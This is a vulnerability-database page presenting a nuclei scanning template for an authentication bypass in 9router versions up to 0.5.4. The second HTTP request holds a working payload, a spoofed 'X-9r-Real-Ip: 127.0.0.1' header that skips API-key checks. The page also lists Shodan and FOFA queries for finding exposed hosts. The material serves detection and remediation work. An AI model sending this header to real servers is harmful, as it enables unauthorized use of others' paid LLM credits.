Lucene search
+L

9router <=0.5.4 - Authentication Bypass

🗓️ 24 Sep 2026 06:33:43Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Unauthenticated authentication bypass in 9router <=0.5.4 via X-9r-Real-Ip header.

Related
Refs
Code
id: CVE-2026-56681

info:
  name: 9router <=0.5.4 - Authentication Bypass
  author: 0x_Akoko
  severity: high
  description: |
    9Router prior to 0.5.6 contains an authentication bypass caused by trusting client-supplied X-9r-Real-Ip header in src/dashboardGuard.js, letting remote unauthenticated attackers access local API routes and consume resources, exploit requires bypassing API-key validation via header manipulation.
  impact: |
    Remote attackers can bypass API-key validation to use LLM providers, consume paid credits, and enumerate models without authorization.
  remediation: |
    Update to version 0.5.6 or later.
  reference:
    - https://github.com/advisories/GHSA-5mj8-gf6m-fhw8
    - https://github.com/decolua/9router/security/advisories/GHSA-5mj8-gf6m-fhw8
    - https://github.com/decolua/9router/commit/efd20be8d81ef2e256a7037f3aa78e6b567b5fd3
    - https://github.com/decolua/9router/releases/tag/v0.5.6
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2026-56681
    cwe-id: CWE-807
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"9Router"
    fofa-query: body="9Router"
  tags: cve,cve2026,9router,auth-bypass,llm,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /api/v1/models HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'status_code == 401'
          - 'contains(body, "API key required for remote API access")'
        condition: and

  - raw:
      - |
        GET /api/v1/models HTTP/1.1
        Host: {{Hostname}}
        X-9r-Real-Ip: 127.0.0.1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "json")'
          - 'contains_all(body, "owned_by", "object", "data")'
        condition: and
# digest: 490a0046304402206af69a734874f1af2c67a8e4dcca8fd00b1cc8dcdd68cd73f7670ba1a9105a3b0220219ffe12f8709601265dd9457b1ab443eb9a0c621f3e3b90aa68fda70d342b45:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Sep 2026 02:58Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17.3
EPSS0.00475
8